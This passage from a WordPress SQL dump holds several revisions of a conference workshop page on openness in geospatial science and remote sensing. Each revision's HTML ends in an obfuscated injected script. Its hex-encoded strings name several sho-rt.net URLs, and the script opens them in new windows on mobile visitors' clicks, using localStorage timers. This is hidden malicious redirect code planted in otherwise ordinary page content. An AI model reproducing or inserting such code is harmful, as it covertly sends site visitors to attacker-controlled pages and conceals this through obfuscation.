u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:11:00','2023-01-01 19:11:00','',3497,'https://gsw2023.com/?p=3516',0,'revision','',0),
(3517,1,'2023-01-01 19:11:47','2023-01-01 19:11:47','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3499\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:11:47','2023-01-01 19:11:47','',3497,'https://gsw2023.com/?p=3517',0,'revision','',0),
(3518,1,'2023-01-01 19:13:06','2023-01-01 19:13:06','<p>[vc_row][vc_column][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][vc_column_text]</p>\n<h5><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 